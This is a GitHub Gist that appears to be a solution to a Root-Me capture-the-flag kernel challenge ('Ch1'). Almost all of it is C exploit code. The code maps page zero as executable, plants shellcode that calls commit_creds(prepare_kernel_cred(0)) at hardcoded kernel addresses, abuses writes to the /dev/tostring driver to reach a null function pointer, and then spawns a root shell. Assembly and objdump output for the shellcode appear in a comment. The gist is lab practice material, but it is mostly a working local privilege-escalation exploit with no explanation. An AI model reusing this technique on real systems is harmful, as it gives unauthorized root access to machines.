Last active
November 13, 2017 14:27
-
-
Save HopHouse/736ca79ffa72d08444a606b8866fb5c1 to your computer and use it in GitHub Desktop.
Ch1 root-me
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <sys/types.h> | |
| #include <stdio.h> | |
| #include <sys/stat.h> | |
| #include <fcntl.h> | |
| #include <sys/mman.h> | |
| #include <string.h> | |
| // commit cred: c1070e80 | |
| // prepare kernel cred c10711f0 | |
| // gcc script.c -static -m32 -o script && chmod 777 ./script | |
| /* | |
| assembleur: | |
| .globl _start | |
| _start: | |
| xor %eax , %eax | |
| call 0xc10711f0 | |
| call 0xc104800f | |
| ret | |
| gcc ass.s -nostdlib -m32 -Ttext=0 -o ass | |
| app-systeme-ch1@challenge03:/tmp/tmp.JCFlLjA0es$ objdump -d ass | |
| ass: file format elf32-i386 | |
| Disassembly of section .text: | |
| 00000000 <_start>: | |
| 0: 31 c0 xor %eax,%eax | |
| 2: e8 e9 11 07 c1 call c10711f0 <_end+0xc10701e0> | |
| 7: e8 03 80 04 c1 call c104800f <_end+0xc1046fff> | |
| c: c3 ret | |
| 31 c0 | |
| e8 e9 11 07 c1 | |
| e8 03 80 04 c1 | |
| c3 | |
| \x31\xc0\xe8\xe9\x11\x07\xc1\xe8\x74\x0e\x07\xc1\xc3 | |
| */ | |
| char payload[] = "\x31\xc0\xe8\xe9\x11\x07\xc1\xe8\x74\x0e\x07\xc1\xc3"; | |
| int main () { | |
| char address[] = "\x00\x00\x00\x00"; | |
| mmap (0 , 4096 , | |
| PROT_READ | PROT_WRITE | PROT_EXEC , | |
| MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, | |
| -1 , 0); | |
| memcpy (0 , payload , sizeof ( payload )); | |
| int fd = open ( "/dev/tostring" , O_WRONLY ); | |
| int i; | |
| for(i = 0; i < 65; i++){ | |
| write ( fd , address , 4); | |
| } | |
| close(fd); | |
| char tmp[1]; | |
| fd = open ( "/dev/tostring" , O_RDONLY ); | |
| read(fd, tmp, 1); | |
| close(fd); | |
| system ("/bin/sh"); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment